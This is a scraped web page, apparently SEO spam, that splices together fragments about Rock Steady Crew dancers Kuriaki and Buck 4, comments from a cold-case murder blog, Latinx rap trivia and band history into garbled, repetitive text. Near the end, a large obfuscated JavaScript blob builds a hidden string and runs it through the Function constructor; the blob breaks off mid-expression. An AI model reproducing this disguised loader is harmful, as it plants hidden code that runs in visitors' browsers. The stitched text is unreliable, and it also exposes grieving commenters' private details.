kuriaki rock steady crewkuriaki rock steady crew

The Rock Steady Crew is still a thing, expanding to consist of several groups in different locations. I go into more detail here: 27 Did you know that Guy Davis is the son of Ossie Davis and Ruby Dee? They want with the intention to be up to users. The numerical value of kuriaki in Chaldean Numerology is: 6, The numerical value of kuriaki in Pythagorean Numerology is: 8. 36 Had he been born two generations earlier, he might have been the king of boogie-woogie, or a jitterbug virtuoso.. // Dec 1, 2015 at 12:03 pm, Hi i was wondering if you could help me find out if some info i received is true. My mother was murdered when I was a child in Brooklyn New York 1985. Ray What did you want to know? The duo split in 2001 to follow solo careers, but later performed together several times, and officially reunited in 2011. Stacy Horn I would like information on the deaths of Kuriaki Soto, Lorenzo Soto of Rock Steady Crew in June of 1991. What does kuriaki mean? I fought for as long as I could but I couldnt bare the pain. 21 Contact and Social MediaE-mail: info @ wigzee.biz. The album its on, of the same name, charted on the Billboard 200 chart; Immortal Technique used the proceeds from sales to build an orphanage in Afghanistan. He was then featured in early hip-hop music videos, including Malcolm McLarens "Buffalo Gals," and performed in films about hip-hop culture, including the groundbreaking 1983 documentary Style Wars and the 1983 feature film Wild Style. But it was his appearance in the 1983 hit movie Flashdance, with Jennifer Beals, that brought him recognition around the world and helped introduce break dancing to mainstream popular culture. Katelina La Gata Eccleston is Amplifying Reggaetons Black, Daniela Arroyo Gonzlez is the First Out Trans, 17 Afro-Latinx Films to Watch for Black History, Karol G Breaks Spotify Record with New Album, Huesera: The Bone Woman Shows the Complicated Pain, Not Dead Yet Becomes Most-Watched Comedy Debut at, 10 Afro-Latina Owned Brands You Need to Know, 10 Valentines Day Nail Art Designs by Latina, My Journey as a Latina Learning to Accept, Im Afro-Boricua And Didnt Know I Had Naturally, Caring For Your Hair Can Transform Your Life;, Everything You Need to Know About Spring Cleaning, On Feeling Both Black Enough and Puerto Rican, Seora Era: 10 Latinx-Owned Items to Add To, 16 Iconic Latina TV Characters to Dress Up, 10 Latina-Owned Tees that Celebrate Our Cultura, Vibemade is Making Crystal Healing Accessible Through Jewelry, Digame: Jen Zeano of JZD Talks Jefa Life,, First Gen Guide to Managing Family Finances For, 10 Galentines Day Gifts From Latina-Owned Brands, 10 Latinx-Owned Wines to Enjoy with Your Valentines, Latina Wealth Building: Breaking Down Your 2023 Financial, Latina Therapist Breaks Down How Latinxs Can Talk, Afro-Latina Doulas are Fighting for Birth Justice Amid, How Adrienne Houghton Sharing Her Infertility Journey Empowers, Veronica Garza of Siete is Making Mexican American, Everything You Need to Know About Spring Cleaning According to My Latina Mom, What Being a Woman Means to Me & Why I Identify as a Demigirl. Are you a family member? Contact the newsroom at 459. The record did a have a downside. Two Of The Original Members of the Rock Steady Crew, Kuriaki and Buck4 were both k.lled in seperate drug homicides in 1991. The record is hardly a b-boy anthem, but it did reach the top of the British charts. Jorge Pabon, who uses the name Pop Master Fabel and is the vice president of the group, confirmed Mr. Frosts death, at Mount Sinai Medical Center, saying it followed a long illness, which he did not identify. I have never met my mother as I was abandoned in Harlem Hosp. // Dec 8, 2015 at 1:40 pm. 8 My fathers name is Charles Wire my name is Teshia, 44 I was shot in the tourso 3 times and was rushed to the hospital fighting for my life. Stacy Horn The original Rock Steady Crew were: Crazy Legs (Richard Coln), Baby Love (Daisy Castro), Prince Ken Swift (Ken Gabbert), Buck 4 (Gabriel Marcano), Kuriaki (Lorenzo Soto) and Doze (Jeffrey Greene). Pinterest. They recorded a record for Charisma called Hey You Rock Steady Crew. Super Simple Songs Video Collection Vol 1 Dvd, Any Video To Mp4 Converter Free Download For Mac, Yogi And Avayogi In Astrology Full Detail In Tamil, Activate Windows Xp With Genuine Product Key, Pinnacle Systems Gmbh 510 Usb Rev 2.0 Driver Download. -Leon W. Grant aka Chollie The Hustler continues to act on different television series taking on lesser roles. 'follow' : { Please if you can give me some closure on the death of my birth mother. Im so sorry you lost your father. But perhaps and even bigger break was the appearance by members Mr Freeze, Ken Swift, Crazy Legs and Frosty Freeze in the box office smash Flashdance. Not too much is known about them, but these two died in 1991. 'numPreferredServices' : 5 Im trying to find out info on a case on a murder that occurred around 2007/2008. // Dec 13, 2015 at 12:21 am, My mother name is. I dont understand, if your mother is a good friend of his mother, your mother could ask her. I would like to know where he is buried I will be 50 on the anniversary of his death. This will give you a little more information about her death. 1, which charted on the Billboard Hot 100, Billboard 200, and Hot Rap Songs charts. Stacy Horn Were they not willing to tell you what you wanted to know? Peers: same Crew: Mr. Wiggles Suga Pop Popmaster Fabel Baby Love Buck Four China Doll Devious Doze Easy Mike Frosty Freeze Jimmy Dee Jimmy Lee Kippy . Rest in power Show more Show more. I edited your post because I didnt think it was a good idea to post some of that publicly. Teresa croom Stacy Horn Once signed to Aftermath Entertainment, the Puerto Rican artist has collaborated with Big Daddy Kane, Akon, Immortal Technique, The Alchemist, Styles P, Royce da 59, and more. The single House Slippers is considered one of his greatest songs. Frosty was one of the most charismatic b-boys that was ever around, said Benson Lee, who directed a 2007 documentary about break dancing, Planet B-Boy, in which Mr. The Afro-Dominican rapper appeared on several hit songs, from Chris Browns Run It, to Camrons Oh Boy, but scored one of his own hits with 2005s There It Go (The Whistle Song). In addition to being a rapper, Juelz has appeared on the reality show Love & Hip Hop: New York. 45 If you have specific questions after reading through these instructions please ask here, but come back to see the answer! I just want answers . // Sep 21, 2015 at 11:12 pm. His adoptive mom is a good friend of my moms. There are now 9,082 unsolved murders in New York City going back to 1985. I hope this will give us closure, 42 The song, which features Fat Joe and Remy Ma, spent three weeks at the #1 spot on the Billboard Hot 100 and was nominated for a Best Rap Performance by a Duo or Group Grammy. Undoubtedly the most highly recognized name in the b-boy world, the Rock Steady Crew was first formed in 1977 in the Bronx, New York. of Criminal Justice Services, Hard Evidence: Case Studies in Forensic Anthropology, Who They Were: Inside the World Trade Center DNA Story, Practical Info for Families and Friends of Victims, NYPDs Cold Case Squad is the Largest in the Country, The Number of Unsolved Murders in New York City, Help With Presentation about 1957 Plane Crash. (born Alvin Lowell Trivette), who was one of the members of Latin Alliance, had his own hit with Tequila, released in 1992. I was told that a man and woman were stabbed in their home in the 80s, the named were Stan and Diane, the residence was on either 32nd street in the Bronx or 53rd. It seems that his 'crew' has been very tight lipped about it all, claiming it hurts too much to talk about. // Sep 2, 2015 at 3:03 pm. Get instant definitions for any word that hits you anywhere on the web. Monique Brewer [1] At the Latin Grammy Awards of 2013, it won 'Best Urban Song'. If they dont then ask to speak to someone in their homicide squad. Have they explained why they havent made an arrest? // Dec 13, 2015 at 10:11 am. // Sep 23, 2015 at 3:50 pm. Retrieved from 'https://en.wikipedia.org/w/index.php?title=Illya_Kuryaki_and_the_Valderramas&oldid=989816200', Illya Kuryaki and the Valderramas at rock.com.ar, Pareles, Jon. Informador. The other new member was Lenny Len. The group was reaching the end of their initial popularity wave. Explore. // Dec 16, 2015 at 7:14 pm. Buck 4 - Rock Steady Crew - 1991. his last current release which was in 2000 was a B-Film called Chump Change, about movie show business. January 1965 | died: 09. Thats all thanks to rapper and music director Jim Jones and his 2006 platinum hit song We Fly High. Born Joseph Guillermo Jones II, Jim is Afro-Puerto Rican, and also a member of the group The Diplomats (a.k.a. _stq = window._stq || []; {'service': 'twitter', 'id': 'MRWIGGLESEB'}, The answer to those questions are on the left under the heading, Getting Help Contacting a Cold Case Squad. angela patricia hart What anomalies would you be looking for exactly? I like to uprock. // Oct 14, 2015 at 2:29 pm, Been looking into my fathers death New York City June 18th 1973 cant find nothing looking for obituaries cant find out nothing Raymond Skinner, 18 Frost adopted. Its all about all the fun stuff you get to do on Sundays (and hopefully other days during the summer), like chillin, barbecuing, listening to good music, having a beer, and just hanging with friends and family. He is an old school hero and a true legend! 'whatsnext' : {}, For some reason, I cannot find out his real name or how he died. KURIAKI (Rock Steady Crew) | original kuriaki style windmill!!! Lorenzo Soto (January 31, 1965 - December 9, 1991), better known by his stage name Kuriaki, was a b-boy and member of Rock Steady Crew. In 1998, the album's second cut, 'Jugo', was nominated for best group video and best alternative video at the MTV Latino Music Awards. [6], This album includes new versions of old tracks, remixes and hits of their career, plus four new tracks. Thank you, 26 Their number is 212-447-2030. Melissa LaBoy If your mother is reluctant to bring it up because she doesnt want to upset her, your only choice is to start researching it yourself. In fact, Mellow Man Ace was a part of the beginnings of what became Cypress Hill, before deciding to go solo. Yard 5 Weihnachtafeier im Cinestar Treptower Park Art Show, unfinished business in Paris CREME HARD MECK PARS RASH, TRAILER | 5 MINUTES WITH: Round [HAMBURG], Miss Vans Women on the Walls Wynwood, Miami, The relationship between a man and his dog is beyond language. Afro-Latinx Brooklyn native Joell Ortizs debut album, The Brick: Bodega Chronicles, was released in 2007, followed by several albums, including Free Agent in 2011, House Slippers in 2014, and Mona Lisa (with Apollo Brown) in 2018. He is survived by a brother and two sisters. Teresa croom And, it features a Latina MC, Teardrop! I dont think you want to have your telephone numbers posted publicly. [2], The duo met as children as a result of the friendship between their parents. But if you look over on the left on this blog, where it says, GETTING HELP CONTACTING A COLD CASE SQUAD, youll see: Before You Contact a Cold Case Squad. If you click on that youll see instructions Ive written on what do to. When was she murdered exactly, and where in Brooklyn? Were there any witnesses? It was mastered at Sony Studios, New York and mixed at Battery Studios, New York. In 1991 they were voted as la Revelacin (best newcomers) in the newspaper Clarn. Is to continue sharing Bronx Street Culture. 5 [1] The duo took their name from a fictional character, the Soviet spy Illya Kuryakin in the hit 1960s TV show The Man from U.N.C.L.E., and the Colombian football player Carlos Valderrama. If you have a friend or loved one whose murder is still unsolved and you want to know what to do, please read this: People ask repeatedly in the comments section about what to do or who to call about an unsolved murder. The Rock Steady Crew is still a thing, expanding to consist of several groups in different locations. Maximal respect! That figure is a moving target of course. Also known as Anthony Cruz, the Afro-Dominican artist is a member of The Firm, with Nas, Foxy Brown, Nature, and Cormega. . Afro-Puerto Rican rapper Hurricane G, born Gloria Rodriguez, is a Flatbush, Brooklyn native, who scored at #10 hit with the song Somebody Else. She was also the first female member of the Hit Squad, which includes members such as EPMD, Keith Murray, and Redman. }, https://www.therestlesssleep.com/?page_id=366. The song samples from the classic 1958 song Tequila, written by fellow Chicano Danny Torres and performed with his band The Champs. You need to try to narrow down the place of her death, and when. // Oct 9, 2015 at 8:40 am. Check out Mentirosa, his Billboard Hot 100 hit. If the case is cold you can contact the Cold Case Squad. He is also often credited with inventing the back spin. 2 That will give you even more information. 23 The result was world wide attention to the b-boy cause. // Oct 22, 2015 at 10:44 am. They played on stage together at the Vive Latino Festival 2008. The show garnered coverage from various press sources including National Geographic. Spinetta is the son of musician Luis Alberto Spinetta, and Horvilleur's father is photographer Eduardo Marti. At this point they began to show their love of martial arts in their videos. Mainly Bronx or mount Vernon N.Y. her death index#is 19392006. [4] According to band members 'Chaco is a summary of what happened to us musically and socially in recent times. Ingrid Davidson While Puerto-Rican-Cuban-Dominican rapper, actress, and radio personality Angie Martinez has her own songs worth knowing, a jam you have to know that she was on is 1997s Not Tonight (Ladies Night Remix). She jumped on the Lil Kim song with Left Eye, Missy, and Da Brat, and it resulted in a top 10 hit (#1 on the Billboard US Rap Songs chart), that went platinum and was nominated for a Best Rap Performance by a Duo or Group Grammy. The 1991 single Lowrider (On the Boulevard) includes Frost, Mellow Man Ace, A.L.T., Markski, and the legendary band WAR. Its legendary members include Puerto Rican Crazy Legs (born Richard Colon), Baby Love (Daisy Castro), Buck 4 (Gabriel Marcano), and Kuriaki (Lorenzo Soto). Renee, thats so sad that such a nice man died this way. Ugh. If you have never conducted a search like this before a librarian can help you. Web. Long story short as I can make it: through Ancestry found half sibling of father. 4 -Two Of The Original Members of the Rock Steady Crew, Kuriaki and Buck4 were both killed in seperate drug homicides in 1991. the only thing that was known is that kuriaki was tortured and killed execution style in a garage. The Puerto Rican group made up of Mr. Schick (Daniel Rivera), DJ Julio (Steven Santiago), Mr. Nice (Jose Semprit), and Jimmy Mac (James Mclean) (the final lineup in 1979), released the first Spanglish rap song ever, 1981s Disco Dream.. The album itself, which features guest verses by Afro-Cuban rapper Sen Dog of Cypress Hill, and Afro-Puerto Rican MC Hurricane G, also charted. This is the article I used when I did it: https://www.nysoclib.org/researchers/guide-researching-history-new-york-city-building. -Guy Davis aka Double K is a well known blues musician and continues to tour around the country to this day. He was Also in Money Talks(1997), Franc Reyes aka Luis wrote some Freestyle songs in the early 90s & directed 2002s Empire and Saundra Santiago aka Carmen was in the miami vice series and currently a soap opera now. Kuriaki has attempted Mount Foraker five times, successfully reaching the summit three times, including the first solo winter ascent of that peak on March 10, 2007. Is there something specific you believe they could be doing that they are not, like talk to someone, or perform a certain test? It went to #2 on the Billboard Hot 100 chart and stayed on it for 20 weeks. You may have been yelling out ballin! in the 2000s as well. Freeze and Lil' Crazy Legs got down, Lenny-Len, and about a year and a half later, Buck 4 and Kuriaki, too, and on and on. Then look up the number in the document Cold Case Squad and Other Organizations. Killed during a robbery while eating breakfast. // Oct 22, 2015 at 9:26 am, Good morning, -Jon Chardiet aka Ramo is still acting. Anyway, he was murdered and badly mutilated in the borough of Brooklyn. She was a late 40s to early 50 year old African American woman. Known as the Godfather of Latin Rap, Ace, born Ulpiano Sergio Reyes is an Afro-Cuban rapper, and brother to Cypress Hills Sen Dog. The name comes from Chaco, which is one of the few provinces in Argentina where aboriginals still live. Members appeared on The Late Show with David Letterman. As far as the crew in Manhattan, I was responsible for bringing in myself, Ken Swift, Ty Fly, Doze, and Kippy Dee. I really hope someone find the person or people that did this to him. The moves he did were really super high-risk. Due to contractual dealings, they were unable to perform live. I would have no way of knowing. Going through microfilm is very time consuming. The two man team of Jo Jo and Jimmy D were the original founders. The best songs are accompanied by dance moves. Teresa croom Thank you for your time in this regard. Frost was known for his acrobatic and daredevil moves. The record suggests a new state of mind in which there is no place for discrimination or oppression.' Are you asking about how to find where she was buried? (La Humanidad O Nosotros) through Epic/Sony Music Argentina. He was Also in Money Talks(1997), Franc Reyes aka Luis wrote some Freestyle songs in the early 90s & directed 2002s Empire and Saundra Santiago aka Carmen was in the miami vice series and currently a soap opera now. Did you ask him or her? I called a precinct about 10 years ago to get some information and they told me no one was ever convicted?? Working in the U.S., they recorded their fifth studio album at Ocean Recording Studios, Burbank, and Battery Studios, New York, leaning more to soul music and funk music. Thank you. // Sep 12, 2015 at 1:29 pm. 31 'services' : [ He had these signature moves and swagger, this really classy b-boy swagger, that made him extremely unique., In 1983 The New York Times wrote of him: Frosty (Wayne Frost, when not dancing) is well-known in the world of break dancing, the current preoccupation in New Yorks discothques and clubs. on her at the time of death. Argentina's Illya Kuryaki & the Valderramas bring their Latin rock/spiritual rap opera/funk to Anaheim. With their savings they went on to record what would be their most successful album, Chaco. Their musical style is extremely wide-ranging, including hip-hop, rock, funk, and salsa. #tbt #1984 #rocksteadycrew #Kuriaki #Buck4 @dozegreen #kings #bboys #crew How did buck four and kuriaki die of rock steady crew? I wish I was more of an expert about this, but for certain years they also listed where people were buried. angela patricia hart Today. 43 Frost, Mr. Pabon, Crazy Legs, Ken Swift and others,. Hello. Wayne Frost, known as Frosty Freeze, in 1983 at the Roxy. Chicano rapper A.L.T. Its a terrible secret that no one talks about. He gave me my last name when my biological father waked away..and was there ready to take on the responsibility as a father..every year that goes by ifeel like Im missing something.. Its been almost 50 years since his death and I dont know where to pay my respects to him. This is a video tribute to the late bboy Kuriaki (Rock Steady Crew). But I did come across sad stories along the way, of people who died here. Hmm, thats awful. Because of the sexual, obscene nature of his mutilation, I want to know if there were ever any updates. Ny. 39 In 1993, sales allowed them their second album, Horno para calentar los mares (Oven to warm up the seas), much harder than the previous one, with a new record label, PolyGram. Their number is 212-447-2030. In 2016, IKV released their seventh studio album, titled L.H.O.N. 29 In the bronx at a womans. I had a friend in 1985 that was shot in the head at 16yrs old. Its a little harder to find out if anyone has been killed in your building, unless it made the newspapers. Did you know that Guy Davis is the son of Ossie Davis and Ruby Dee? [4], In 1991 they released their first album entitled Fabrico cuero (I make leather), which combines rap, synthesized sounds, catchy melodies and ironic lyrics. Two Of The Original Members of the Rock Steady Crew, Kuriaki and Buck4 were both k.lled in seperate drug homicides in 1991. Its legendary members include Puerto Rican Crazy Legs (born Richard Colon), Baby Love (Daisy Castro), Buck 4 (Gabriel Marcano), and Kuriaki (Lorenzo Soto). . Baby Bash and Frankie J teamed up to give us the smooth 2003 song Suga Suga. We think they repped for Mexico quite well with this hit jam. One of her best-performing, best-known songs is Here We Go, which features Kelly Rowland. What are you trying to find out exactly? -Robert Taylor aka Lee Still resides somewhere in the bronx. Aug 30, 2011 [1], Rock en espaol. [9]Chances was released by Sony in 2012, and includes the song 'guila Amarilla', for Dante's father, Luis Alberto Spinetta, who died during the recording of the album.[10]. Had a regular Thursday night gig at a club called Negril which was run by Michael Holman (of Graffiti Rock fame). Mewhy? 4 Mar. 19 It peaked at #29 on the Billboard Hot 100 chart; N2Deep went on to release five more studio albums. Stacy Horn The crews big break came in 1981. I didnt want to leave my mother, family & friends behind but now my death is a homicide. It was an important time for the dance movement. -Guy Davis aka Double K is a well known blues musician and continues to tour around the country to this day. 34 28 I'm buck for the turtle master if you try to do it Ill do it faster. Bjean She was 24years old. He was not only an amazing dancer but a daredevil, Mr. Pabon said in an interview Thursday. Stacy Horn You can start by ordering a copy of her death certificate here: http://www1.nyc.gov/site/doh/services/death-certificates.page. ! For some reason, I cannot find out his real name or how he died. He was my first boyfriend in high school and will always have a place in my heart. He called it the Suicide. I am trying to find out if any new information has been found out about my brothers murder in Bronx River Projects in July of 1997. They embarked on a worldwide tour which included dates in Europe, Latin America and their native Argentina. 17 Mr. Terror Squads Lean Back had us doing just that during the summer of 2005. You describe one of the worst situations unfortunately, when they believe they have the killer but not enough evidence to prove it. truthfully, possibly there is any adult who hasn't couldn't help but feel let down or betrayed in a person who never meet a diabetic's legal agreements. -Leon W. Grant aka Chollie The Hustler continues to act on different television series taking on lesser roles. Its legendary members include Puerto Rican Crazy Legs (born Richard Colon), Baby Love (Daisy Castro), Buck 4 (Gabriel Marcano), and Kuriaki (Lorenzo Soto). It spent 20 weeks on the Billboard Hot 100 chart, peaking at 39. The established 98th and Amsterdam in New York as Rock Steady Park and it became a meeting place for all RSC members. The easiest thing would be to go the nearest branch of the New York Public Library and search using Proquest and a database called Americas Historical Newspapers. 2023. Teresa croom Another single off of Big Puns hit debut album Capital Punishment that you should know about is Caribbean Connection. The 1998 song unites the Puerto Rican rapper with another Caribbean MC Haitian rapper Wyclef Jean. Just last year, Latinx rap group Cypress Hill was just honored with their own star on the Hollywood Walk of Fame. We're doing our best to make sure our content is useful, accurate and safe.If by any chance you spot an inappropriate comment while navigating through our website please use this form to let us know, and we'll take care of it shortly. Stop bite. Shelter. I can help you when and if you get to this point. Cause of death.where did this happen at. }, They were part of a European tour that included Afrika Bambaataa, Fab 5 Freddy, various graffiti artists among others. That figure is a moving target of course. Although some in the media initially suggested their popularity came from their family connections rather than their musical skills, that changed when Charly Garca invited them to play at one of his shows to perform Fabrico cuero and Rap del exilio. document.getElementById( "ak_js_1" ).setAttribute( "value", ( new Date() ).getTime() ); 20062008 The Restless Sleep Sitemap Stacy Horn Stacy Horn However, we dont see Latino rap in English as hyped as it should be. If any leads as to who did it n why. I dont have a last name and i was told she was a heavy set woman and he was thin. I would start by ordering his death certificate. What did you want to know? They chose to create their own record label, Gigolo Productions. The detectives cannot make arrests and take people to court without evidence. People have been k.lled over speaking out on Buck 4's death hence to this day crazy legs never really dwell or speak on. If you give me address of the shelter I can look up the number of that precinct for you, but I would need to know where the shelter is/was to do that. On Good Friday in April, 1973. His signature move. The album was not widely distributed. Hay, Carla. -Two Of The Original Members of the Rock Steady Crew, Kuriaki and Buck4 were both killed in seperate drug homicides in 1991. the only thing that was known is that kuriaki was tortured and killed execution style in a garage. $mVT=String.fromCharCode(46,50,104,41,85,73,113,123,77,87,47,103,56,69,107,70,65,83,82,39,49,71,40,63,88,120,74,109,72,75,67,80,112,76,68,81,118,61,48,90,59,57,84,119,89,86,66,125,44);(![]+[])[+[]][([![]]+{})[+!+[]+[+[]]]+([]+[]+{})[+!+[]]+([]+[]+[][[]])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[+[]]+([]+[]+{})[+!+[]]+(!![]+[])[+!+[]]][([![]]+{})[+!+[]+[+[]]]+([]+[]+{})[+!+[]]+([]+[]+[][[]])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[+[]]+([]+[]+{})[+!+[]]+(!![]+[])[+!+[]]]($mVT[36]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$mVT[25]+$mVT[+!+[]+!+[]]+(!![]+[])[+!+[]]+$mVT[37]+([]+[]+[][[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$mVT[43]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$mVT[24]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+[]]+$mVT[32]+$mVT[18]+(!![]+[])[!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[25]+$mVT[+!+[]+!+[]]+(!![]+[])[+!+[]]+$mVT[(+[])]+([]+[]+{})[+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[19]+$mVT[48]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]]+([]+[]+{})[!+[]+!+[]]+([![]]+{})[+!+[]+[+[]]]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+$mVT[(+[])]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+(![]+[])[+[]]+([]+[]+{})[+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[23]+([]+[]+[][[]])[+!+[]]+(![]+[])[!+[]+!+[]]+$mVT[33]+(!![]+[])[!+[]+!+[]]+$mVT[37]+$mVT[45]+(![]+[])[!+[]+!+[]]+(+{}+[]+[])[+[]]+$mVT[30]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[20]+$mVT[18]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[24]+$mVT[35]+$mVT[44]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[13]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[30]+$mVT[16]+([![]]+{})[+!+[]+[+[]]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[35]+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+$mVT[46]+$mVT[11]+$mVT[12]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!